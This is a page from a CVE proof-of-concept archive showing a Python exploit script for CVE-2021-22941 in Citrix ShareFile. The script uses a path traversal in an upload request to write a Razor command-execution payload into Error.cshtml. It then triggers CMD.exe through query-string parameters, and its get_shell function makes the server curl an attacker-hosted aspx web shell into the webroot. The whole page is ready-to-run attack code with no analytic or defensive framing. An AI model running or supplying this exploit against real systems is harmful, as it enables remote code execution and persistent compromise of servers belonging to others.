4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-22941
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import random
import string


def parse_args():
    import argparse
    parser = argparse.ArgumentParser(prog="python3 exloit.py")
    parser.add_argument('-u','--url',required=True,type=str,default=None)
    parser.add_argument('--proxy',required=False,type=str,default=None, help="Proxy URL, support HTTP proxies (Example: http://127.0.0.1:8080)")
    parser.add_argument('--ping',required=False,type=str,default=None,dest="IP",help="Ping to ip address")
    parser.add_argument('--shell',required=False,type=str,default=None,help="Your aspx shell address (Example: http://127.0.0.1/shell.aspx)")
    return parser.parse_args()

def encode_multipart_formdata(files):
    boundary = "boundary"
    body = (
        "".join("--%s\r\n"
                "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n"
                "\r\n"
                "%s\r\n" % (boundary, files['name'], files['filename'], files['content_file'])
                +"--%s--\r\n" % boundary
    ))
    content_type = "multipart/form-data; boundary=%s" % boundary
    return body, content_type

def check_connection(url, proxies):
    try:
        print("[*] Checking connection...")
        requests.get(url, proxies=proxies,timeout=10)
    except Exception:
        print("Connection failed, please check url/proxy again!")
        return False
    print("[*] Connection successfully!")


def exploit(url, proxies):
    content_file = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(4096))
    files = {
        "name": "text4",
        "filename": "text5",
        "content_file": content_file
    }
    data, content_type = encode_multipart_formdata(files)
    headers = {"Content-Type": content_type}
    payload = "@using System.Diagnostics;@{int idx0= 0;string str_idx0 = idx0.ToString(); int idx1 = 1;string str_idx1 = idx1.ToString();string cmd = Request.QueryString[str_idx0];string arg = Request.QueryString[str_idx1];Process.Start(cmd,arg);}"
    params = {
        "uploadid": payload+'/../../ConfigService\Views\Shared\Error.cshtml',
        "bp": "123",
        "accountid": "123"
    }
    target = url + "/upload.aspx"
    try:
        requests.post(target, data=data, params=params, headers=headers, proxies=proxies)
    except Exception as e:
        print(e)

def check_ping(url,ip, proxies):
    target = "%s/configservice/Home/Error?0=CMD.exe&1=/C ping -n 5 %s" %(url,ip)
    requests.get(target, proxies=proxies)

def get_shell(url,url_shell,proxies):
    filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
    target = "%s/configservice/Home/Error?0=CMD.exe&1=/C curl %s  -o \"C:\inetpub\wwwroot\Citrix\StorageCenter\%s.aspx\"" %(url,url_shell,filename)
    requests.get(target, proxies=proxies)
    print("Your shell is located at /%s.aspx" %filename)

def main():
    args = parse_args()
    url = args.url
    ip = args.IP
    url_shell = args.shell
    proxies = {
        "http":  args.proxy, 
        "https": args.proxy
    }
    if(check_connection(url, proxies)==False):
        return
    exploit(url, proxies)
    if ip != None:
        check_ping(url,ip,proxies)
    if url_shell !=None:
        get_shell(url, url_shell, proxies)
    print("[*] Exploit Ended!")

main()